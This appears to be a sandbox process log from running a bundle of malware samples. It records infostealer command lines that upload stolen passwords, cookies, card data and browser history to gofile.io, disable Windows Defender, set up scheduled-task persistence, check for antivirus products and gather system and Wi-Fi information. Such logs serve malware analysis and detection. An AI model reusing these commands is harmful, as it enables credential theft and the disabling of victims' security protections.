"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=4976 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=5420 /prefetch:8

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\fcxcx.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\fcxcx.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Users\Admin\AppData\Local\Temp\4F5E.tmp.ssg.exe

"C:\Users\Admin\AppData\Local\Temp\4F5E.tmp.ssg.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe

"C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe

"C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe"

C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe

"C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfc29cc40,0x7ffdfc29cc4c,0x7ffdfc29cc58

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --disable-http2 --use-spdy=off --disable-quic

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdfc733cb8,0x7ffdfc733cc8,0x7ffdfc733cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2068 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=2144 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=utility --disable-quic --disable-http2 --mojo-platform-channel-handle=2780 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=4764 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=5516 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=utility --disable-quic --disable-http2 --mojo-platform-channel-handle=3732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tmp.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tmp.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mode con: cols=125 lines=35

C:\Windows\system32\mode.com

mode con: cols=125 lines=35

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get UUID

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 812297

C:\Windows\SysWOW64\findstr.exe

findstr /V "IndieBeachesHonIo" Janet

C:\Windows\sysnldcvmr.exe

C:\Windows\sysnldcvmr.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\g

C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif

812297\Shopzilla.pif 812297\g

C:\Windows\SysWOW64\timeout.exe

timeout 15

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"

C:\Windows\system32\taskkill.exe

taskkill /im firefox.exe /t /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile

C:\Users\Admin\AppData\Local\Temp\3076928777.exe

C:\Users\Admin\AppData\Local\Temp\3076928777.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe"

C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif

C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 812297

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\g

C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif

812297\Shopzilla.pif 812297\g

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe"

C:\Windows\SysWOW64\timeout.exe

timeout 15

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe'

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9F7D.tmp\9F7E.tmp\9F7F.bat "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/arht/releases/download/seht/archive.htm/' -outfile archive.htm"

C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe

"C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004D8

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‏ .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‏ .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand …"

